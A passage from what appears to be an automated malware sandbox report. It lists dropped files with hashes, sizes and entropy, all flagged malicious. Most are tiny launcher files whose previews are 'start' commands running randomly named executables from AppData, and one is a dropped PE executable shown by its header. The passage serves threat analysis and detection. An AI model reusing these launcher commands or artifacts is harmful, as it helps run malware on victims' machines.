                                                      Malicious:true
                                                      Preview:start "" "C:\Users\user\AppData\Local\S0yywC6t6qDFXXOiN4mRrQOm.exe"
                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):73
                                                      Entropy (8bit):4.887172724225211
                                                      Encrypted:false
                                                      SSDEEP:3:Ljn9m10nacwRE2J5DoXERHLLL8sACl:fE1cNwi23dRHLLt
                                                      MD5:CDEF18C395DC42ABE7B84D668962E3C8
                                                      SHA1:E4DBC974EC4D5836FA2C37816769B1B90A92E5F3
                                                      SHA-256:2673222EE932014529E77D30B1D6463DFC4D5FE659393F8124C147C7019AEE7E
                                                      SHA-512:DB66AA92BB5B8751BDCB8C2AB41288E2494D7D58345958C81F9E441E7C230E175CA4F7830CA5826802ACAABB8CA858AF6EF602E5643C70C8B60C491F1D2470F0
                                                      Malicious:true
                                                      Preview:start "" "C:\Users\user\AppData\Local\fqTri05otLw3AgCCHnmdVecS.exe"
                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):73
                                                      Entropy (8bit):4.854428073190098
                                                      Encrypted:false
                                                      SSDEEP:3:Ljn9m10nacwRE2J5vZvL6t+PD8n:fE1cNwi23xU68
                                                      MD5:4AD51C9BA041E86D955290740D39710A
                                                      SHA1:F8672C932EF7CDA9A90415B9E0228F69D92F86C2
                                                      SHA-256:900664C025B2052FDA4835D791F9B6607D03A172C06CED5F09A575C8C401F8D3
                                                      SHA-512:EF29A09D7DEBC419BED11D1587042C0D8287D6C71849BC343B2746B73BACB45B0D5E2DB3B16493C8AD429C9958C030D226B6DC04C6E21B7E203462EBF7D3BB98
                                                      Malicious:true
                                                      Preview:start "" "C:\Users\user\AppData\Local\JjDJbN3mgLfy7jfCjajQylmg.exe"
                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):73
                                                      Entropy (8bit):4.941967244773158
                                                      Encrypted:false
                                                      SSDEEP:3:Ljn9m10nacwRE2J5y9JRnzWoLAdAln:fE1cNwi23y9JRzWWAdAl
                                                      MD5:F49CF90E4950D2DF8BA46B2B30E89773
                                                      SHA1:27DBC0ACAF6E09178A0E1C5886F36671B8D41641
                                                      SHA-256:4F6093E21CD2A5EFA811205BD07551B507AE1F6A8C73BBD58FA7DB42D4CB33EE
                                                      SHA-512:C3445592D7F0EAD19709C063FEF5E32D6AD02A6703CB3535205496DDB336414666F349AB4503C98FB33945F95E7CB3FDAE21C6ACCAB0ED3A53F9E84364B9B6D3
                                                      Malicious:true
                                                      Preview:start "" "C:\Users\user\AppData\Local\WAQu9tLKGblXXebB2miyLMLA.exe"
                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):73
                                                      Entropy (8bit):4.930258299947495
                                                      Encrypted:false
                                                      SSDEEP:3:Ljn9m10nacwRE2J5E7yg1kRA6cAln:fE1cNwi23E7yg1x6cm
                                                      MD5:9C64EDCA35770809E2DB32E47841CAB2
                                                      SHA1:6D7DA26150D5E0967C80653ADE4720E248AB2598
                                                      SHA-256:370E8ADD21452D89AAD1E77E560675E47BAD1052073BD1DF79ED08971B206616
                                                      SHA-512:B2100EB58E801F29C4C10C70C5F21D5CA7186D26E51C53B49EDF06F85293392FCF782A4A2754B44D5C2A70C2C5252DE5997952487292313900A3E2F1F55907B0
                                                      Malicious:true
                                                      Preview:start "" "C:\Users\user\AppData\Local\aqGWEPmkK0B9sJyfEBtpOpuJ.exe"
                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):73
                                                      Entropy (8bit):5.018811634833935
                                                      Encrypted:false
                                                      SSDEEP:3:Ljn9m10nacwRE2J5zBS1CM3tWM0Cl:fE1cNwi23NgRMML
                                                      MD5:57887A5367356C4343874457E354F69B
                                                      SHA1:CE76B238C798F1C48CDAB42AA297660CFBF21E67
                                                      SHA-256:2C7E76367C0FB539AAE6550E6F8395BCBA993E8520A52A334F1A34895EC86C2B
                                                      SHA-512:5D4A2673B3EA7EC8597B62CE2FC15B1AA17205A89DE1CC63DC07E82E71AC28000672CE55F945BAF6A198B20376E5EE7A6382667F6597BF713A913E451DFD9DD0
                                                      Malicious:true
                                                      Preview:start "" "C:\Users\user\AppData\Local\VwW7Zrgqb8W4pCzz9zGBtVYi.exe"
                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):73
                                                      Entropy (8bit):4.965385134424482
                                                      Encrypted:false
                                                      SSDEEP:3:Ljn9m10nacwRE2J5vQ3zrxnpIFsn:fE1cNwi236zN+s
                                                      MD5:294B1674E7D8C2F2F32981B34A214851
                                                      SHA1:5B8BBA37F2040CAE6C76A9899114624A0641EFCB
                                                      SHA-256:5D63ABA1ABFE74E2316B5AF715E5E6E1E2E4E3F3CF38CDF087FE30C986A04AD8
                                                      SHA-512:1D77F7BB2FB1D5C82B395DBCB924FDF793C29240592D1A156413B145662863950DA840975760787D73B7B5D6CDBDC2C09A0B3EAD8A90E2C90AB345E1C2591239
                                                      Malicious:true
                                                      Preview:start "" "C:\Users\user\AppData\Local\JRER40VeoC2Q4ducOjAkB8be.exe"
                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):73
                                                      Entropy (8bit):5.051202429033939
                                                      Encrypted:false
                                                      SSDEEP:3:Ljn9m10nacwRE2J5zLUCZbe9aCHF:fE1cNwi233U8be9Hl
                                                      MD5:FD2DE773E92ADD0C69593ABA00CE6A32
                                                      SHA1:E40D260782E45DD013277956BB43796F52F2E19B
                                                      SHA-256:71B8337A6DF45C208C74241931DFA3632E34BB64D9AE9595C31F4911336E521C
                                                      SHA-512:CB642670BC70A3188E302B485E2AA07DA4B76EC9391E284F2D49272926FF83EB534CC9F6458D083DA97157C7C2BE04B544DF472BC64FF562B1007AD2C0394AAA
                                                      Malicious:true
                                                      Preview:start "" "C:\Users\user\AppData\Local\VEH3hOo7SH8Curivn14XA2XL.exe"
                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):73
                                                      Entropy (8bit):4.883193353602563
                                                      Encrypted:false
                                                      SSDEEP:3:Ljn9m10nacwRE2J5umtwiWjb4m:fE1cNwi23uAXWjbv
                                                      MD5:2833A946FDCA8DF43B22404393DA09CA
                                                      SHA1:80ECF0CD155104BF1D4393223BF2B8DCCF494A66
                                                      SHA-256:B564381A1B321858A47739B06AFD24E5EACC9288BCEF15C4E73DE574F1B932BD
                                                      SHA-512:7721892D01C1C63460F560483D60FBEA9BF8A60F45840273740602A266A85726081B6FCD45391D3FA81F35426FDA4D4FE897090A42DE7B1CEEE6A934CE7A6C0B
                                                      Malicious:true
                                                      Preview:start "" "C:\Users\user\AppData\Local\KFwijURKZUrjToqwGsuVqcsD.exe"
                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):75
                                                      Entropy (8bit):4.865076357995963
                                                      Encrypted:false
                                                      SSDEEP:3:Ljn9m10nacwRE2J5kjXs79ifSV1nqArWn:fE1cNwi23kDs79i+17rW
                                                      MD5:24C0B09C1F338B0A517F523832EC1FDA
                                                      SHA1:3991851AFB9890A598EED59C4303B9C84A413D21
                                                      SHA-256:0CF8E0CF414E0FEC7E272E43B259B4A4354DCAB8B3970042E20713D32DE8F7C5
                                                      SHA-512:4DF35B77058F8A9DC0728514F6A90DCE76FB4A0B4C3C1C12F4336D5ADE8192CB333305385CA03B93C1B451DF2C6CCD6D1FB45FA0B6B9859769EEFC753C420832
                                                      Malicious:true
                                                      Preview:start "" "C:\Users\user\AppData\Local\AFlhDPRBYXSdsXlIscLwpPBI.exe" /s
                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):73
                                                      Entropy (8bit):4.941967244773156
                                                      Encrypted:false
                                                      SSDEEP:3:Ljn9m10nacwRE2J5PUyJ54wyHPn:fE1cNwi23JrQHP
                                                      MD5:59BCD7E9C725E8EF092C434E97CE534C
                                                      SHA1:7AAEAD7CE9D0092FEAB04353EDCE1104424B9E58
                                                      SHA-256:2D7F6EBBDA0CCAC20D7A3A5910B0E0F39025A3D89E84274DBBD86390D5A0E21F
                                                      SHA-512:1EC9B552FE0593CA93F160E8E0EB469510DC90DC538D611BFC6C5BAD070EFF71ACDE2DD28469BBFB7B5CB281C2C1319AF33E83DF2378B4C0296D136164B76F30
                                                      Malicious:true
                                                      Preview:start "" "C:\Users\user\AppData\Local\j19ppip6hQlQefTQJUWb1E5Y.exe"
                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):73
                                                      Entropy (8bit):4.86114348408973
                                                      Encrypted:false
                                                      SSDEEP:3:Ljn9m10nacwRE2J5CWzYwOtHFn:fE1cNwi23CWJA
                                                      MD5:74BBEB1FB726FB078F6DE67F3D2AD95B
                                                      SHA1:BB724D746E9205C18BB6291B86EDE778E6C581DA
                                                      SHA-256:2580CF708A6012955B2760E71E19B850E4037AD7EB4E53089ADE932AA4F6FDF2
                                                      SHA-512:A605071FF7E3831DCA8AB80959FADD9DE21C7763657F70EA00D1C7A3B264BAA8B586AB9812BC115E0F80DFEA82FB7F035AE3C2B7CFED47266744781139D650E7
                                                      Malicious:true
                                                      Preview:start "" "C:\Users\user\AppData\Local\gsV4lhPLd9AgpTxUWWWokC1J.exe"
                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):75
                                                      Entropy (8bit):5.067570904765206
                                                      Encrypted:false
                                                      SSDEEP:3:Ljn9m10nacwRE2J5fAEWaMF0CCQWn:fE1cNwi234EWaS0IW
                                                      MD5:F82967195CA40D5F98C09E1C69544500
                                                      SHA1:31CA48D38C71C95EEB895C7F67258E3967575028
                                                      SHA-256:18B2553008255B63EF9849FCBBFD8E40477A8B387D5B6443E14A2E87DDC3D30B
                                                      SHA-512:7DFF2DEED528DC18F0D644A911A990839096FBB73CB64407F61663486DC92BFC212958808F67CEAAB8C798023CF01A57FD7E6FF46A6D92FA4C8D174BFCE64F66
                                                      Malicious:true
                                                      Preview:start "" "C:\Users\user\AppData\Local\zPFKv97tg3hm10kOTWpULC1K.exe" /s
                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):73
                                                      Entropy (8bit):5.020179654972426
                                                      Encrypted:false
                                                      SSDEEP:3:Ljn9m10nacwRE2J5S6JaWdLdiFn:fE1cNwi23SI5diF
                                                      MD5:DEB0E2A47C0BCBA022E29F7FB454EBC2
                                                      SHA1:BCCB52DDBF8A3B5153564F6493FD99B7028D0571
                                                      SHA-256:A4DC71EA68415A1560EF9BC9E7D67EB577BEECFFD5A2E427D26610F472A330DF
                                                      SHA-512:6F7C130C41DF24BE35BDC2F5D9D0057A1B18E5E96E9C62C30A8CDF89060846A137FFFCA2B1FD6283BC931FFAE5E12B327DE481BA79A73F635CCD2E8714A4C1EC
                                                      Malicious:true
                                                      Preview:start "" "C:\Users\user\AppData\Local\w4xiNBVLdPuuQzpgLYTzx18Y.exe"
                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):73
                                                      Entropy (8bit):4.811123149097904
                                                      Encrypted:false
                                                      SSDEEP:3:Ljn9m10nacwRE2J59dvFNgAWOLACl:fE1cNwi23/vgAL0Cl
                                                      MD5:05E277B5AAC42BC60B52C8411006DCE7
                                                      SHA1:48B51FB183B5B35A1BFF92201266050CC4528BC4
                                                      SHA-256:BB6D5781259A6D74FE9DE2DC7EB7F5795B86A8F507FACBC054163FE296A6E270
                                                      SHA-512:D72EE5BCE2FE6D891B9246FA0A145B037A4A83678812A57746F2DC3C427626C0F6BD9FA71D57B5180D164499B241A505A83FC0F7306C5528B15F121CE2E9B083
                                                      Malicious:true
                                                      Preview:start "" "C:\Users\user\AppData\Local\XxYZdepnteJj9ehuEwVshtV3.exe"
                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):73
                                                      Entropy (8bit):4.87683179953804
                                                      Encrypted:false
                                                      SSDEEP:3:Ljn9m10nacwRE2J5KwZvc3yNJl:fE1cNwi23KAvGyNL
                                                      MD5:D1B94F55375706224A19B7DD6208AC56
                                                      SHA1:ABE6E521D4DFF702FD2D3EFA40157CA892F8F2B8
                                                      SHA-256:18BB943AC081C6E986984B9AF7989B78C22F195A30E7D709C45F6EB588070D29
                                                      SHA-512:47CA0E5CF4F0DD2464BCC0D16B5A1FE61F6BC5D17A80EE230F00139638AACD0D6CE738E6CBA2D2EBD07F9047E015528D0211A50F9FB49DC097B4A6715A3D9C77
                                                      Malicious:true
                                                      Preview:start "" "C:\Users\user\AppData\Local\oZEH3cHEU5SysFjbUbbRDrah.exe"
                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):73
                                                      Entropy (8bit):4.941967244773156
                                                      Encrypted:false
                                                      SSDEEP:3:Ljn9m10nacwRE2J5jRN5TsWK31ACl:fE1cNwi23tN5TsNFAs
                                                      MD5:EFB216544CF3A953DEE46D4E3A2E2B42
                                                      SHA1:08D877F15D7C1518ECDCFE2392BEEB95456F1009
                                                      SHA-256:7B5D3B2180C81106DD145412BEE56926E14C8EB68E649235BC79255D36E21CFF
                                                      SHA-512:A8F3FDE472414A43EB5796FC0CBAC55978EDE0D22AE52AD6B327D677167EF792D7D297DFA94160420DA9DA3E82FA0F9F1C0C7CEEA2998384EE1028D4E834135E
                                                      Malicious:true
                                                      Preview:start "" "C:\Users\user\AppData\Local\F4U52lR6G7O1cHxteAioycWo.exe"
                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):73
                                                      Entropy (8bit):4.900249689189366
                                                      Encrypted:false
                                                      SSDEEP:3:Ljn9m10nacwRE2J5yEG3fMMrwJF:fE1cNwi23yEaNcJF
                                                      MD5:F3A7BA916E05B1EC0CBED16A9E73C64D
                                                      SHA1:065A024AA1AD991360C87667E398206B75D8D9D4
                                                      SHA-256:8FB5C898DCEC8A0CAB52F489A2EE247EB49EE08079838A02604D0D5789F8BAD8
                                                      SHA-512:6D00F464A5CC1D9200ED208E8278ECC115DD4AF20730098E9B8DBEA2A580465EB91C13DF94B63323FAE8200E0BF00F2AB143077B1D0666C9A45E9E8690A2C62F
                                                      Malicious:true
                                                      Preview:start "" "C:\Users\user\AppData\Local\WaSFZllUCVoGMQbapl7iiNhG.exe"
                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):75
                                                      Entropy (8bit):5.052300944395516
                                                      Encrypted:false
                                                      SSDEEP:3:Ljn9m10nacwRE2J5TVVInzq3GiWLca4AHFKWn:fE1cNwi23Zinzq31lpiwW
                                                      MD5:FC8FA2C35ABC002BAD7B76D126DC20EF
                                                      SHA1:61C7B8ADD4065B0299CB2E427E186480D5757C15
                                                      SHA-256:855CE7A76D2674B3D80F26B19C5A1CE0D48DA997268636A01A0D6E5A9E59CB68
                                                      SHA-512:F119DACC332B881C7ED476E9B619702A161FA03F7BCB16FA79090944480E4D3F88E9D1AFD72467844024A447BBA2E7D182DF8B2D077DFF769DBC2A42770AA137
                                                      Malicious:true
                                                      Preview:start "" "C:\Users\user\AppData\Local\v0F2dmnMQ8GuOxPTeGs09I9Y.exe" /s
                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):73
                                                      Entropy (8bit):4.936619854012017
                                                      Encrypted:false
                                                      SSDEEP:3:Ljn9m10nacwRE2J5PSg6jcx05iF:fE1cNwi23agYWF
                                                      MD5:41728ADAC821EE6E7946C768F5243B08
                                                      SHA1:13D20A17E43854C4015C370345FE74850D94051B
                                                      SHA-256:7CA383B52E86249D6938EE171800FC7305CBFB568C63F2BEDA19388C1BFDDD49
                                                      SHA-512:9ED0F9206150BEEF93039C1EABAED09291ADB35D21FFA0D19740B4142D568580414282A892A2D6174658FA7B7D5F5DE4B171EF8CB77EABC242C8A5DF033465F6
                                                      Malicious:true
                                                      Preview:start "" "C:\Users\user\AppData\Local\jRw9sx4Ek0t13Tr93vMM8tJ1.exe"
                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):73
                                                      Entropy (8bit):4.867858894989361
                                                      Encrypted:false
                                                      SSDEEP:3:Ljn9m10nacwRE2J5D9UhOF3cgULn:fE1cNwi235Uh2sgUL
                                                      MD5:27CE1711E1D58DBA0A5363BB6A118233
                                                      SHA1:8A95A3B5278E54856CB940FAB211FEB5C84E3381
                                                      SHA-256:FC8E061B60103B6C838FDE57E27A0DB800AE46757651B0B37D0E978D7DE0B552
                                                      SHA-512:CFBBD99B32E1034D4680396BF09B008359BCCEE4076B5F48CF2EE1D6909762BE7BD376058F34564F6B93FF526D82231F298BFF32022992B743DB6D30CD49108B
                                                      Malicious:true
                                                      Preview:start "" "C:\Users\user\AppData\Local\fb815uICkCyOkfRy3eesDn62.exe"
                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):73
                                                      Entropy (8bit):5.0565498197950784
                                                      Encrypted:false
                                                      SSDEEP:3:Ljn9m10nacwRE2J5X5UkroiTnUss:fE1cNwi23pjoi+
                                                      MD5:D0EDA5E185180BA5C10FB5F13BBFE750
                                                      SHA1:A256CB680E3A00B507725B3D88A4F52CF903122A
                                                      SHA-256:43F7A91F7E13FC5C64C5F0E138DADABD5D251FDC35FEFF2DE08AD2FDAD349CA7
                                                      SHA-512:37A80F29AD41B65B6841208A34D6BD532F91DC7C2230CD72B72F7A3F2FA6C40BC6538EEC09B799D2BB004B0F7A6FD296555209CA8FA46CF5F13B315C54DD9C9D
                                                      Malicious:true
                                                      Preview:start "" "C:\Users\user\AppData\Local\2nhKzHIgDWCzStH9EAQv4dqj.exe"
                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):73
                                                      Entropy (8bit):4.902861039673521
                                                      Encrypted:false
                                                      SSDEEP:3:Ljn9m10nacwRE2J5dm++BsDqW0s:fE1cNwi23dN
                                                      MD5:DB92805A065B79BF1C332DA84383EC5B
                                                      SHA1:CB915E22008F031FEA37D7EE632D85BD2B40E619
                                                      SHA-256:B76A9616A5C846241E409A26200F6B0837FE27328A307F15DB1EF997D7D692AC
                                                      SHA-512:08C98D77858CF9EF49270A285C44E4ADE3DF168B14675EEFB25E64C419DF3F73E4728C35880087916DBFE0745D771191628DFF6BEA4DF79ABCE6653D87AC34A3
                                                      Malicious:true
                                                      Preview:start "" "C:\Users\user\AppData\Local\xCvbsgibKaoe0JrKdFZUHTO3.exe"
                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):73
                                                      Entropy (8bit):4.833746223815757
                                                      Encrypted:false
                                                      SSDEEP:3:Ljn9m10nacwRE2J5yNQudzGLWmAOVkAln:fE1cNwi23yi8GLW36L
                                                      MD5:B5830EC41C9786D8C03F831999E1B381
                                                      SHA1:E19CA9DB2F08D7708E0DE9043C9B612E21D0232F
                                                      SHA-256:0D9B63C4B44354F16FBE33FCBC4617DEDE40BCFB6D14B639E7208F4D8A44CF9A
                                                      SHA-512:6BAB81CD65A95D06678D149BF88FCACDBC5ACDE73565568808417CB08909B54D06985F80A9EBDC18246DDDCAD106B4913A69181608D3D9C83A933C47AA6C46A7
                                                      Malicious:true
                                                      Preview:start "" "C:\Users\user\AppData\Local\Wh0WdTK7FmemcqdqznsDUek0.exe"
                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):75
                                                      Entropy (8bit):5.105634277728849
                                                      Encrypted:false
                                                      SSDEEP:3:Ljn9m10nacwRE2J5tV9Mvu8Ko9ArWn:fE1cNwi23neurW
                                                      MD5:9243EA60D2FE235EA9FC92130BBCD76D
                                                      SHA1:378F0899F66B6401E9302E6643D12B6511A260BB
                                                      SHA-256:8191498634FF38F9435F84AF2CF00FD1CC57FE58CB5337332B0289863B1B71DB
                                                      SHA-512:C1B1D0F9A54426C2A54A64C7BEA4FA6974AF2272239B5AC68D2E57842F5BCA1719F8C939D6C68E0279290BAB71D7BE4A2EBBF937A3935C4E873D09F1BBB4D51B
                                                      Malicious:true
                                                      Preview:start "" "C:\Users\user\AppData\Local\H0hJPxhIO3F6BQNxVzuoHmfd.exe" /s
                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):73
                                                      Entropy (8bit):4.975726059111652
                                                      Encrypted:false
                                                      SSDEEP:3:Ljn9m10nacwRE2J52t5TLlqy5dmn:fE1cNwi232vT4yDm
                                                      MD5:1246C2811437D1F6118305562F42D027
                                                      SHA1:0A8CA47C5D74A8AC2AAB1393CEDBBA248F353857
                                                      SHA-256:161DFBCEACE83D2A953E41502D38DEA4559FC90AF0C0535EFC3E790FF38199DC
                                                      SHA-512:80C169DE24350E633E21DC8DEC32F958E4525521D4DF9BC257AAFC3D8A121A97F18D6EB548758C9CAE993E52843AF50E75283C060A79A20456C5D0E85585327B
                                                      Malicious:true
                                                      Preview:start "" "C:\Users\user\AppData\Local\SMjkjKVfovgJQv0DVgLWunVz.exe"
                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):73
                                                      Entropy (8bit):5.008470710146765
                                                      Encrypted:false
                                                      SSDEEP:3:Ljn9m10nacwRE2J50s66YLBndTLVFn:fE1cNwi230t6YvHVF
                                                      MD5:868B0FA4E039A3CA6F10CD329F4D6A03
                                                      SHA1:A642921BF0544C318116786FCA41676DC8CF0302
                                                      SHA-256:92ED0A26A66F691EEDF9A0CA976CF73A6ADCFBEED19A13CE9F3723CB45298091
                                                      SHA-512:E1EE3920E3FC7DDF57A255D43071D9C64738DE340F1F7BEAE9B84AAC1B5F4AE667D4275773ED6A1EB62057084E6BC27B65E9793E707122D666E95A83E7FF2D15
                                                      Malicious:true
                                                      Preview:start "" "C:\Users\user\AppData\Local\QdAnaM3mjG9zwvm6YlndB8Yg.exe"
                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):75
                                                      Entropy (8bit):4.91277569843938
                                                      Encrypted:false
                                                      SSDEEP:3:Ljn9m10nacwRE2J5NI1iHGHcv20sKWn:fE1cNwi23iivu+W
                                                      MD5:21CEFF6BFBADCDE76B2B80B1780BE62D
                                                      SHA1:4F211ECFBD01CEB4DC3D691BF7B28FB14CC77B5C
                                                      SHA-256:EF6E5781D02460C75BAC83B47F0ED333E432F54536E8C7FEB0A30F2810F9F4D6
                                                      SHA-512:D71CF64BB955EA16DB0435511A865FEBD06394F5D841139FD71815630A2C47646B1271F7918BF217157766D8C60C65C87E75491AD23CD87A2DA138CC013F77B1
                                                      Malicious:true
                                                      Preview:start "" "C:\Users\user\AppData\Local\hmtNBhlQWScQGAc2r9fH2laz.exe" /s
                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):73
                                                      Entropy (8bit):4.904229059812012
                                                      Encrypted:false
                                                      SSDEEP:3:Ljn9m10nacwRE2J5Go+FqCSkiF:fE1cNwi23Go+HKF
                                                      MD5:239E6D49FEEEEF02D82A1B0ABA5A94FF
                                                      SHA1:62612FBA415B8D9B3AB8FACB5F0AC13A5956C9D2
                                                      SHA-256:065244DBA8899B6CF95E47A52509286B0EAABA7B484176E96468A214ABF29ED6
                                                      SHA-512:DF956C5EBB3599866F70BA45B4D9A8178707E71749F991A4CAA8D08D13ABF984EDF8AC3790093CE8AAA5A8C1BDB8D892EA1261E71D576E6A5FA42294111D5DC2
                                                      Malicious:true
                                                      Preview:start "" "C:\Users\user\AppData\Local\cIoVbmWEriSiViaXsDVPRBww.exe"
                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):73
                                                      Entropy (8bit):4.952308169460329
                                                      Encrypted:false
                                                      SSDEEP:3:Ljn9m10nacwRE2J5Xh/0bXUHkv:fE1cNwi23x/DHkv
                                                      MD5:4D8012E79BC4D10697D7CFE3C5964D16
                                                      SHA1:46E21DC53F1BCD035F49C7253196E7EC753AA36D
                                                      SHA-256:D1DA651F416199E2F73987932AAA65EEF9BA701408CA4A5B7418D75506A948BC
                                                      SHA-512:3AC967A1672AB3D157DB70F5D25150A89BEF9326F65763A10541963E7A339B2041E138A7A2A040F0213554E2BC8E9F5EBE39048845EE07F8E87F5EF44877E7D8
                                                      Malicious:true
                                                      Preview:start "" "C:\Users\user\AppData\Local\rCs1RclDFMYQLymrwE3zboPd.exe"
                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):75
                                                      Entropy (8bit):4.925503944337822
                                                      Encrypted:false
                                                      SSDEEP:3:Ljn9m10nacwRE2J5q3GegLfgOAjRiwWn:fE1cNwi23q3GFgOAjRiwW
                                                      MD5:50041A83F7EEB7FA8E3CCBCCB1B285B7
                                                      SHA1:6E818FD0198DB793EC3DEDBAD21F77307E72B4D5
                                                      SHA-256:A8643100DA1EFD37A5D6E8CC7B1C1225BBF608F052BA9F33AEA166EF54C11A3B
                                                      SHA-512:1934E8C5CD063926B9926FE80F00E7F7B959E04480C35092B2CC73E8F695CDEC644383A316EFAF3E8D622F5FB54219D9B855CF031FC7714EBFFE8538D2DFE5AD
                                                      Malicious:true
                                                      Preview:start "" "C:\Users\user\AppData\Local\O6FJxszjCn1zgUzc3ngkew5Q.exe" /s
                                                      Process:C:\Windows\explorer.exe
                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):223744
                                                      Entropy (8bit):6.935500931385667
                                                      Encrypted:false
                                                      SSDEEP:3072:Kuznf8GvOGOqHDT6C3q+OElN2SeYgzOdZRJZlb3asijEq95mdBbx1ldvhqy:Hf8COqjmC64eYgzOJZlWsi19YdX1ld
                                                      MD5:C5A6381354CD5D1488E362C9103C1851
                                                      SHA1:3D87BC60F2C8A74BCD0295AF4EDF02D9486BE3B5
                                                      SHA-256:B69CF7AEC22182A247D52D76C200A78128CCCAFA246DEDAFC8898824DB7424F9
                                                      SHA-512:2C22149B37041AE844F3A12459C8A7EA837B1F62E0F54D4C9FC188D823433B92497AB697F841C05D958A758A9A2B69AC0DDB779659B19721FEED54B4C5736CE7
                                                      Malicious:true
                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........n...............................................N.............N......Rich............................PE..L.....Md.....................N.......>............@..........................`.......d.......................................i..P...................................i..............................@_..@...............d............................text.../........................... ..`.rdata...q.......r..................@..@.data...`1.......x...\..............@....rsrc..............................@..@................................................................................................................................................................................................................................................................................................................................................................
                                                      Process:C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe
                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):4815512
                                                      Entropy (8bit):7.796002238696443
                                                      Encrypted:false
                                                      SSDEEP:98304:+yjDqWHejZxTbsZFmVRVMGGLwMjzfq/+gIopszmuJDRXts3fYw:+uz+jZuyWTzjzp1opszZL9s3fF
                                                      MD5:C0FEE8DB6325C8C1B3F8CCD13574C65A
